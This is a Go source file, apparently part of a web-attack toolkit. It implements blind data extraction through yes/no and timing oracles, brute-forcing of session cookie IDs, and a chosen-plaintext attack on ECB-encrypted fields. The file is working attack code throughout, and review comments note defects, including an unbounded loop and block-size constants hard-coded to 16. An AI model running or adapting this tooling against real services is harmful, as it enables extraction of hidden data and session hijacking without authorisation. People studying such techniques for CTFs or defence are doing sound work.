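package main

import (
	"encoding/hex"
	"net/http"
	"strconv"
	"strings"
	"time"
)

// BruteForceString recovers a string through a yes/no oracle. The wrapped
// SetDataGrabber must answer "1" when the pattern written into Field matches
// and anything else when it does not.
//
// Prefix and Suffix surround every pattern, Wildcard is the "match anything"
// token of the target's pattern language, and First is placed directly before
// the recovered text to anchor it at the start of the value.
type BruteForceString struct {
	SetDataGrabber
	Field, Prefix, Suffix, First, Wildcard string
}

// Grab returns the longest string, built from the alphabet below, that the
// oracle confirms as a prefix of the hidden value.
//
// Every candidate costs one call to the wrapped Grab, so the number of
// requests grows with len(chars) plus len(result) times the number of
// characters found in the first pass.
func (s BruteForceString) Grab(r http.Request) string {
	const chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890"
	var result, knownChars string

	// Pass 1: keep only the characters that occur anywhere in the value, so
	// that pass 2 iterates over a smaller alphabet.
	for _, c := range chars {
		s.SetDataGrabber.SetKey(s.Field, Text{s.Prefix + s.Wildcard + string(c) + s.Wildcard + s.Suffix})
		if s.SetDataGrabber.Grab(r) == "1" {
			knownChars += string(c)
		}
	}

	// Pass 2: extend the confirmed prefix by one character per round and stop
	// as soon as no known character extends it.
Loop:
	for {
		for _, c := range knownChars {
			s.SetDataGrabber.SetKey(s.Field, Text{s.Prefix + s.First + result + string(c) + s.Wildcard + s.Suffix})
			if s.SetDataGrabber.Grab(r) == "1" {
				result += string(c)
				continue Loop
			}
		}
		return result
	}
}

// NotContain turns a Grabber into a boolean oracle that is true when the
// wrapped output does not contain NotMatch.
type NotContain struct {
	Grabber
	NotMatch string
}

// Grab returns "1" when the wrapped output lacks NotMatch and "0" otherwise.
func (n NotContain) Grab(r http.Request) string {
	if !strings.Contains(n.Grabber.Grab(r), n.NotMatch) {
		return "1"
	}
	return "0"
}

// Contains turns a Grabber into a boolean oracle that is true when the
// wrapped output contains Match.
type Contains struct {
	Grabber
	Match string
}

// Grab returns "1" when the wrapped output contains Match and "0" otherwise.
func (c Contains) Grab(r http.Request) string {
	if strings.Contains(c.Grabber.Grab(r), c.Match) {
		return "1"
	}
	return "0"
}

// TakesTime turns a Grabber into a boolean oracle based on elapsed time.
type TakesTime struct {
	Grabber
	time.Duration
}

// Grab returns "1" when the wrapped Grab took longer than Duration and "0"
// otherwise. The measurement is a single wall-clock sample, so ordinary
// latency jitter can flip the answer.
func (t TakesTime) Grab(r http.Request) string {
	start := time.Now()
	t.Grabber.Grab(r)
	if time.Since(start) > t.Duration {
		return "1"
	}
	return "0"
}

// BruteForceRange tries every ID produced by Range in Field until the oracle
// answers "1".
type BruteForceRange struct {
	SetDataGrabber
	Range
	Field, Prefix, Suffix string
}

// Grab returns the first ID for which the wrapped Grab answers "1". It panics
// when the range is exhausted without a hit.
func (b BruteForceRange) Grab(r http.Request) string {
	for b.Range.Next() {
		idStr := b.Range.ID()
		b.SetDataGrabber.SetKey(b.Field, Text{b.Prefix + idStr + b.Suffix})
		if b.SetDataGrabber.Grab(r) == "1" {
			return idStr
		}
	}
	panic("no cookie found")
}

// Range is a forward-only iterator over candidate IDs. Next must return true
// before ID is called.
type Range interface {
	Next() bool
	ID() string
}

// NumRange iterates over the integers Start+1 through End. Start is an
// exclusive lower bound because Next increments it before the first ID.
type NumRange struct {
	Start, End int
}

// Next advances to the following integer and reports whether it is within
// the range.
func (r *NumRange) Next() bool {
	r.Start++
	return r.Start <= r.End
}

// ID returns the current integer in decimal.
func (r *NumRange) ID() string {
	return strconv.Itoa(r.Start)
}

// RangeList chains several ranges and consumes them front to back.
type RangeList []Range

// Next advances the head range, dropping every range that is exhausted.
//
// The replacement head is advanced with its own Next before true is
// reported. Reporting true without that call would expose an ID the new head
// never produced through Next, and would treat an empty head as non-empty.
func (r *RangeList) Next() bool {
	for len(*r) > 0 {
		if (*r)[0].Next() {
			return true
		}
		*r = (*r)[1:]
	}
	return false
}

// ID returns the ID of the head range. It panics on an empty list, so call it
// only after Next has returned true.
func (r *RangeList) ID() string {
	return (*r)[0].ID()
}

// RangeSuffix appends a fixed Suffix to every ID of the wrapped Range.
type RangeSuffix struct {
	Range
	Suffix string
}

// ID returns the wrapped ID followed by Suffix.
func (r RangeSuffix) ID() string {
	return r.Range.ID() + r.Suffix
}

// RangeHex hex-encodes every ID of the wrapped Range.
type RangeHex struct {
	Range
}

// ID returns the lowercase hex encoding of the wrapped ID's bytes.
func (r RangeHex) ID() string {
	return hex.EncodeToString([]byte(r.Range.ID()))
}

// ECBBreaker uses an encryption oracle to obtain ciphertext blocks for a
// chosen PlainText. It depends on the oracle producing equal output blocks
// for equal input blocks, which is the defining weakness of ECB mode.
type ECBBreaker struct {
	Encrypter interface {
		Grabber
		SetKey(string, Grabber)
	}
	EncrypterField string
	PlainText      string
}

// Grab measures the oracle's block size, finds the padding that aligns the
// controlled input to a block boundary, and returns the oracle output from
// the first aligned block onward for PlainText. It returns "" when the
// computed start position lies outside the final output.
//
// All lengths are measured on the string returned by Encrypter.Grab, so they
// are in whatever encoding that string uses.
func (e ECBBreaker) Grab(r http.Request) string {
	e.Encrypter.SetKey(e.EncrypterField, Text{""})
	initialLength := len(e.Encrypter.Grab(r))
	i := 1
	firstChange := -1
	secondChange := -1
	// Grow the input one byte at a time; the distance between two consecutive
	// jumps in output length is the block size.
	// NOTE(review): this loop has no upper bound and never ends if the output
	// length does not change twice.
	for {
		e.Encrypter.SetKey(e.EncrypterField, Text{strings.Repeat("A", i)})
		l := len(e.Encrypter.Grab(r))
		if l != initialLength {
			if firstChange == -1 {
				initialLength = l
				firstChange = l
			} else {
				secondChange = l
				break
			}
		}
		i++
	}

	blockSize := secondChange - firstChange

	var offset, blockStart int
	str := strings.Repeat("B", blockSize-1) + strings.Repeat("A", blockSize*2)

	// NOTE(review): 15 and 16 below are hard-coded while blockSize is
	// measured above; the two agree only when blockSize is 16.
Loop:
	for i := 0; i < 16; i++ {
		e.Encrypter.SetKey(e.EncrypterField, Text{str[15-i:]})
		resp := e.Encrypter.Grab(r)
		last := ""
		// Stop before a trailing partial block: slicing past len(resp) would
		// panic when the output length is not a multiple of blockSize.
		for j := 0; j+blockSize <= len(resp); j += blockSize {
			cur := resp[j : j+blockSize]
			if cur == last {
				// Two equal consecutive blocks are the run of "A"s, so i
				// filler bytes align the input to a block boundary.
				blockStart = (j / 16) - 1
				offset = i
				break Loop
			}
			last = cur
		}
	}

	e.Encrypter.SetKey(e.EncrypterField, Text{strings.Repeat("B", offset) + e.PlainText})
	enc := e.Encrypter.Grab(r)

	// Check the start index so a short or unexpected response cannot panic.
	start := blockStart * blockSize
	if start < 0 || start > len(enc) {
		return ""
	}
	return enc[start:]
}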